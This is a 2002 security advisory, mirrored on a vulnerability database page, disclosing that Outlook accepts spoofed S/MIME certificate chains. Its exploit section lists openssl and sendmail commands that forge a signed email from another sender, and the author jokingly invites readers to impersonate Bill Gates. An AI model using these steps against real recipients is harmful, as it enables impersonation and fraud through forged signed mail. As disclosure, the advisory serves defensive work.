Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:3448
HistorySep 03, 2002 - 12:00 a.m.

Outlook S/MIME Vulnerability

2002-09-0300:00:00
vulners.com
7
JSON

=======================================================================
Outlook S/MIME Vulnerability 09/02/02
Mike Benham <[email protected]>
http://www.thoughtcrime.org

=======================================================================
Abstract

Outlook's S/MIME implementation is vulnerable to the certificate chain
spoofing attack, despite Microsoft's claim that IE is the only affected
application. The vulnerability allows anyone to forge the digital
signature on an email that is to be viewed with Outlook. No warnings are
given, no dialogs are shown.

========================================================================
Description

For a complete description of the certificate chain attack, see:
http://online.securityfocus.com/archive/1/286290

As with the IE SSL vulnerability, an attacker generates a bad certificate
chain:

[Issuer:VeriSign | Subject:VeriSign]
>[Issuer:VeriSign | Subject:www.thoughtcrime.org]
>[Issuer:www.thoughtcrime.org | Subject:Bill Gates/[email protected]]

Outlook fails to check the Basic Constraints on the intermediate
certificate and accepts the leaf certificate as valid.

=========================================================================
Severity

As it stands, there is virtually no difference between signed and unsigned
email in Outlook. Unless carefully inspected, signed email in Outlook is
essentially meaningless. This also applies to any signed email received
over the past 5+ years.

Prudent users who must continue using Outlook for signed email should
manually inspect and verify received certificate chains.

========================================================================
Affected Clients

Mozilla is NOT vulnerable.

Outlook Express 5 is vulnerable.
(Tested on fully patched Win2k SP3 system)

========================================================================
Exploit

1) Put a valid CA-signed certificate and private key in a file
"middle.pem"

(If you don't have a valid CA-signed certificate, there's one bundled with
sslsniff: http://www.thoughtcrime.org/ie.html&#41;

2) Generate a fake leaf certificate signing request:

a) openssl genrsa -out key.pem 1024
b) openssl req -new -key key.pem -out leaf.csr

3) Sign the CSR with your "intermediate" certificate:

a) openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem
-CAcreateserial -out leaf.pem

4) Sign a spoofed mail message:

a) openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem
-inkey key.pem -certfile middle.pem -from [email protected] -to
[email protected] -subject "SM Exploit"

5) Send the mail:

a) cat mail.msg | sendmail [email protected]

I encourage everyone to send Bill Gates an email from himself. =)

==========================================================================
Vendor Notification Status

Microsoft knows about this, of course, but "isn't even sure whether to
call this a 'vulnerability'." Right.

  • Mike


http://www.thoughtcrime.org

JSON